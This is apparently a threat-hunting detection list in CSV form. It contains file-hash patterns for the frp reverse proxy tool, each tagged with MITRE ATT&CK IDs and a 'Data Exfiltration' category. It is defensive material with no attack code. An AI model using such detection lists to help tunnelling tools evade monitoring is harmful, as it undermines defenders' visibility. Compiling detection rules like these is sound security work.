"*ce70a9a044271be4336d7376aa1d5c5f8de8497b1e284b083f6d2184d6f57042*",".{0,1000}ce70a9a044271be4336d7376aa1d5c5f8de8497b1e284b083f6d2184d6f57042.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cf5cc61f68d705860538b8d3e865ae026a7b27e4da8c1c1a3f50c5e7827cd097*",".{0,1000}cf5cc61f68d705860538b8d3e865ae026a7b27e4da8c1c1a3f50c5e7827cd097.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cf873001de9c33445213818c5844992e1a3a02486bd3defce556b95e9b0f4af0*",".{0,1000}cf873001de9c33445213818c5844992e1a3a02486bd3defce556b95e9b0f4af0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cfc766cc82568e40d7198493340283cc0f4f42de97463aef863170f7e773ff9c*",".{0,1000}cfc766cc82568e40d7198493340283cc0f4f42de97463aef863170f7e773ff9c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d1d9b02741e5d8742853665aad6a36a74a977fb82108b894712008db8d170276*",".{0,1000}d1d9b02741e5d8742853665aad6a36a74a977fb82108b894712008db8d170276.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d21b617081093f98de5fc1e57700d4a104df67c4965f3fb99dc2650aefbce86f*",".{0,1000}d21b617081093f98de5fc1e57700d4a104df67c4965f3fb99dc2650aefbce86f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d33d83e8b98ce5413603f71b1c0b38c1b5bbe1d1c826b7ada84a7543a6cc6ea6*",".{0,1000}d33d83e8b98ce5413603f71b1c0b38c1b5bbe1d1c826b7ada84a7543a6cc6ea6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d3a481b40889bf4c6fd35b18941de04ddaa2316ad51977a5af7bdddf3650f808*",".{0,1000}d3a481b40889bf4c6fd35b18941de04ddaa2316ad51977a5af7bdddf3650f808.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d458887ece9050b08d1d58c2718110643b87f254981cda6c86f25dd5559e3867*",".{0,1000}d458887ece9050b08d1d58c2718110643b87f254981cda6c86f25dd5559e3867.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d458d70dd88048d1fc898d5422ed570e912d3f3ef3ee5928871438a08514f725*",".{0,1000}d458d70dd88048d1fc898d5422ed570e912d3f3ef3ee5928871438a08514f725.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d48623a74a00577be0409d912f8197a110f13192eab99d3959ceb11496ed0903*",".{0,1000}d48623a74a00577be0409d912f8197a110f13192eab99d3959ceb11496ed0903.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d5d2ee272caa314a731dcc59ed4474c9f34953c617e8c29fdd86ea8c017f2e91*",".{0,1000}d5d2ee272caa314a731dcc59ed4474c9f34953c617e8c29fdd86ea8c017f2e91.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d6373caf2bb26e7956c976d7d9142a082a0c259525bac3d5bb2fcfcbbfa63bc6*",".{0,1000}d6373caf2bb26e7956c976d7d9142a082a0c259525bac3d5bb2fcfcbbfa63bc6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d63b7a3365a5374daa0f9418d26334c3e913d762599071d1d7e629b2e675e4e7*",".{0,1000}d63b7a3365a5374daa0f9418d26334c3e913d762599071d1d7e629b2e675e4e7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d7a7a6085fa6a9f8de0ae2c221c1ef110b9afc2a0122a058482ef3974d031ac0*",".{0,1000}d7a7a6085fa6a9f8de0ae2c221c1ef110b9afc2a0122a058482ef3974d031ac0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*d7c2ffe601af16d168d881b88817df81e9bc8646e56643545bd9a11f01ebac6a*",".{0,1000}d7c2ffe601af16d168d881b88817df81e9bc8646e56643545bd9a11f01ebac6a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*daf162e5cc90599aab036b7bb4ed6d4c521b2f5732a6cb40b08a00e6714deaa3*",".{0,1000}daf162e5cc90599aab036b7bb4ed6d4c521b2f5732a6cb40b08a00e6714deaa3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*db2975501126fc0f61097acdff7484655e5d37b01de8c509c2c5e0e88591fb42*",".{0,1000}db2975501126fc0f61097acdff7484655e5d37b01de8c509c2c5e0e88591fb42.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*db53bdef3b270e45fb9efc489af2948be7c7fa1e3a5cae9698f2832e628bcd3b*",".{0,1000}db53bdef3b270e45fb9efc489af2948be7c7fa1e3a5cae9698f2832e628bcd3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*db778fca7bf230b926b5ebb34d3b97bb3be5a89bec8254f824ccdd57ba2b31e8*",".{0,1000}db778fca7bf230b926b5ebb34d3b97bb3be5a89bec8254f824ccdd57ba2b31e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*db80349f17c39f502a631afda7cf5b95b2a85cdcafa92359b9f4d0375772c440*",".{0,1000}db80349f17c39f502a631afda7cf5b95b2a85cdcafa92359b9f4d0375772c440.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*dc3220af2b22469da26209d4b376858c11160127e83bce09f85cd0c27a44d5d0*",".{0,1000}dc3220af2b22469da26209d4b376858c11160127e83bce09f85cd0c27a44d5d0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*dd781cfd710345cca2df4d306245298efb61dc447d8004dd5542c1b2083e39a7*",".{0,1000}dd781cfd710345cca2df4d306245298efb61dc447d8004dd5542c1b2083e39a7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*dd8057968d3560e9ecb42b2ed50b796ec09573d5263f689c8e0633a8b8a7127a*",".{0,1000}dd8057968d3560e9ecb42b2ed50b796ec09573d5263f689c8e0633a8b8a7127a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*de3397d1084686a5ab9f82fae2aa65f417cef7d7c2cc12f7eb9da51c0a404de6*",".{0,1000}de3397d1084686a5ab9f82fae2aa65f417cef7d7c2cc12f7eb9da51c0a404de6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*de6262f886175411573c98fe2d5838449b4fc2472a07748964159a468ed0ccdf*",".{0,1000}de6262f886175411573c98fe2d5838449b4fc2472a07748964159a468ed0ccdf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*df37d932eb846e608187b0aca6d182467ff24c548a044b9206a93913ec93c752*",".{0,1000}df37d932eb846e608187b0aca6d182467ff24c548a044b9206a93913ec93c752.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*df7356db409cc406294211063bf387a8b590289370811b1d10d6fdd1023c3250*",".{0,1000}df7356db409cc406294211063bf387a8b590289370811b1d10d6fdd1023c3250.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*dfd7bc3410c018dc8bcf897696ddfb10e7aaf5a584b8220ae3949ec87205ea4c*",".{0,1000}dfd7bc3410c018dc8bcf897696ddfb10e7aaf5a584b8220ae3949ec87205ea4c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e0b8976e986ef0ed0901560810a81cc80cf8c332e087edd35f50e9a5a88c79ae*",".{0,1000}e0b8976e986ef0ed0901560810a81cc80cf8c332e087edd35f50e9a5a88c79ae.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e195429f06e01890fa50719ead4dfdc338b80c9703f6d6c7b9e12c234ff2f39f*",".{0,1000}e195429f06e01890fa50719ead4dfdc338b80c9703f6d6c7b9e12c234ff2f39f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e2047b43e87456568a505b84c45f52e0d2ed146896ec1e3fceb72e818200f11f*",".{0,1000}e2047b43e87456568a505b84c45f52e0d2ed146896ec1e3fceb72e818200f11f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e20d90b0670c637a65125f89467170efb3fc227a78f44ee585a6d3fb55b6a881*",".{0,1000}e20d90b0670c637a65125f89467170efb3fc227a78f44ee585a6d3fb55b6a881.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e2a6179880b852366edc395685fa0e82eec542e9c8a2c3483d30d5740941a0e0*",".{0,1000}e2a6179880b852366edc395685fa0e82eec542e9c8a2c3483d30d5740941a0e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e2dd4933cc48caba288be96ba5b226c7edb5be940c0452d9bc7faa28ab66847f*",".{0,1000}e2dd4933cc48caba288be96ba5b226c7edb5be940c0452d9bc7faa28ab66847f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e2f75360702bcdc390997de7b2557f21a1f28d7ebd4d1ca74cf2e38849185bcb*",".{0,1000}e2f75360702bcdc390997de7b2557f21a1f28d7ebd4d1ca74cf2e38849185bcb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e33075389b77f94a816ac45bf1d0ce2b540fd98dafac9828602625088967762f*",".{0,1000}e33075389b77f94a816ac45bf1d0ce2b540fd98dafac9828602625088967762f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e377afeb481b30d9979fcbf636df6b5c4f9449b44f6c3d21a768aa5cb8767cb6*",".{0,1000}e377afeb481b30d9979fcbf636df6b5c4f9449b44f6c3d21a768aa5cb8767cb6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e57919a0e3a63705ef452bb2a6bc440f7a6273a8205ed9ce2ccfd063ea9b2215*",".{0,1000}e57919a0e3a63705ef452bb2a6bc440f7a6273a8205ed9ce2ccfd063ea9b2215.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e61df02bd13c250267ded9f0db8ef0e0f3a3eea63efbb8d041190883b0cee0cb*",".{0,1000}e61df02bd13c250267ded9f0db8ef0e0f3a3eea63efbb8d041190883b0cee0cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e67faadd41e6236f2bd67d35c9dfd807ff2941027686632f6f4c339dea8ef263*",".{0,1000}e67faadd41e6236f2bd67d35c9dfd807ff2941027686632f6f4c339dea8ef263.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*e73e6a2bc3fc1900fb2810bf53bed0471149fb07c60917027661d9d654c0f6e8*",".{0,1000}e73e6a2bc3fc1900fb2810bf53bed0471149fb07c60917027661d9d654c0f6e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ea017c89015802214d1f831d464e018f629856a3a91ac6b350c731aa0e739315*",".{0,1000}ea017c89015802214d1f831d464e018f629856a3a91ac6b350c731aa0e739315.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ea30c0eec6a6a2395212dd91016e134bbde0bd99b3547598e1f71b626fe5c9ef*",".{0,1000}ea30c0eec6a6a2395212dd91016e134bbde0bd99b3547598e1f71b626fe5c9ef.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*eb8ea449f14a20480c77d6501f8b682516fa4a9394dd15d2a49b6a957aa862a9*",".{0,1000}eb8ea449f14a20480c77d6501f8b682516fa4a9394dd15d2a49b6a957aa862a9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*eb941be4a478faf7f2c61a6d5fb5fca889c7908a0d882a06e61c2e1cefc91260*",".{0,1000}eb941be4a478faf7f2c61a6d5fb5fca889c7908a0d882a06e61c2e1cefc91260.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ec8938be2d1b535eeaf7ba803dae2b6fa1059c6106791d59d98600928dfcc057*",".{0,1000}ec8938be2d1b535eeaf7ba803dae2b6fa1059c6106791d59d98600928dfcc057.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ed25f0c61c45c7f013f2f5ef9194cb2854805db9c692f656e2b30a6ad1681436*",".{0,1000}ed25f0c61c45c7f013f2f5ef9194cb2854805db9c692f656e2b30a6ad1681436.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ee2d0d800b14ac26b8aeae4365df031e0186d23be150308735a0be753ec2d3f9*",".{0,1000}ee2d0d800b14ac26b8aeae4365df031e0186d23be150308735a0be753ec2d3f9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ee8cdc63c2993ce8ab2bf918a56169a815254cd5f5a9a57567a904ec5dbf0145*",".{0,1000}ee8cdc63c2993ce8ab2bf918a56169a815254cd5f5a9a57567a904ec5dbf0145.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*eeb4247038f58d6b89bd5608782489eeaa7bcfb83d61b5475284ab612978b328*",".{0,1000}eeb4247038f58d6b89bd5608782489eeaa7bcfb83d61b5475284ab612978b328.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ef44189d246b4a95e0eabbf1d6d86ba94002e6f2bb5eefca8e3e8b8292abc085*",".{0,1000}ef44189d246b4a95e0eabbf1d6d86ba94002e6f2bb5eefca8e3e8b8292abc085.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*efd2156b1477d88b8ce1d9428cdeb1689bd12cefb4b31ca81b70eb7d65e22e59*",".{0,1000}efd2156b1477d88b8ce1d9428cdeb1689bd12cefb4b31ca81b70eb7d65e22e59.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f0439788bbeda72664259defbc0edb12825cbf2928c922e06103b7b715bae88a*",".{0,1000}f0439788bbeda72664259defbc0edb12825cbf2928c922e06103b7b715bae88a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f0716ffcfd48207b8de4f82ccf9ba87e876f0700f6699fc1140d08b7a8f741b4*",".{0,1000}f0716ffcfd48207b8de4f82ccf9ba87e876f0700f6699fc1140d08b7a8f741b4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f14655042086ef4653c0351a6464fb7d73473baf26e15a5f59c298bd3df23d1c*",".{0,1000}f14655042086ef4653c0351a6464fb7d73473baf26e15a5f59c298bd3df23d1c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f1985ce963979371360df27054ba07df4d4ee35338880bed83ef609a4648c420*",".{0,1000}f1985ce963979371360df27054ba07df4d4ee35338880bed83ef609a4648c420.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
